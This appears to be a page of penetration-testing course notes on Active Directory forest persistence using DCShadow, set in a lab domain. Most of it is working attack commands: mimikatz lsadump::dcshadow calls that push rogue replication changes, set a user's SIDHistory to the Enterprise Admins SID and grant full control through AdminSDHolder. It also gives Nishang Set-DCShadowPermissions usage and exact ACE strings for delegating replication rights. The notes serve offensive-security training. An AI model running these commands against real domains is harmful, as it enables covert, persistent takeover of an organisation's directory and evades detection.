Forest Persistence

DCShadow

• We can use mimikatz for DCShadow. Two mimikatz instances are required:
• One to start RPC servers with SYSTEM privileges and specify attributes to be 
modified:
!+
!processtoken
lsadump::dcshadow /object:root1user /attribute:Description /value="Hello 
from DCShadow" • And second with enough privileges (DA or otherwise) to push the values. 
lsadump::dcshadow /push


• DCShadow can be used with minimal permissions by modifying ACLs of - – The domain object.
• DS-Install-Replica (Add/Remove Replica in Domain)
• DS-Replication-Manage-Topology (Manage Replication Topology)
• DS-Replication-Synchronize (Replication Synchornization) – The Sites object (and its children) in the Configuration container.
• CreateChild and DeleteChild
– The object of the computer which is registered as a DC.
• WriteProperty (Not Write)
– The target object. 
• WriteProperty (Not Write)
• We can use Set-DCShadowPermissions from Nishang for setting the 
permissions.

• We can use Set-DCShadowPermissions from Nishang for setting the 
permissions.
• For example, to use DCShadow as user student1 to modify root1user 
object from machine mcorp-student1:
Set-DCShadowPermissions -FakeDC mcorp-student1 -
SAMAccountName root1user -Username student1 -Verbose
• Now, the second mimkatz instance (which runs as DA) is not required.

• Once we have permissions sorted out, so much of interesting stuff can 
be done. 
• For example, set SIDHistory of a user account to Enterprise Admins or 
Domain Admins group:
lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-5-
21-280534878-1496970234-700767426-519
• To use above without DA:
Set-DCShadowPermissions -FakeDC mcorp-student1 -
SAMAccountName root1user -Username student1 -Verbose


• Modify ntSecurityDescriptor for AdminSDHolder to add Full Control for a user 
(New-Object
System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin
SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec
tSecurity.sddl
• We just need to append a Full Control ACE from above for SY/BA/DA with our 
user's SID at the end. 
lsadump::dcshadow
/object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local 
/attribute:ntSecurityDescriptor /value:<modified ACL>


• We can even run DCShadow from DCShadow which I have named Shadowception: (New-Object
System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca
l")).psbase.ObjectSecurity.sddl
• We need to append following ACEs with our user's SID at the end:
• On the domain object: 
(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)
(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID) • On the attacker computer object: (A;;WP;;;UserSID) • On the target user object: (A;;WP;;;UserSID) • On the Sites object in Configuration container: (A;CI;CCDC;;;UserSID)
PreviousCross Forest Privilege EscalationNextMSSQL Abuse

Last updated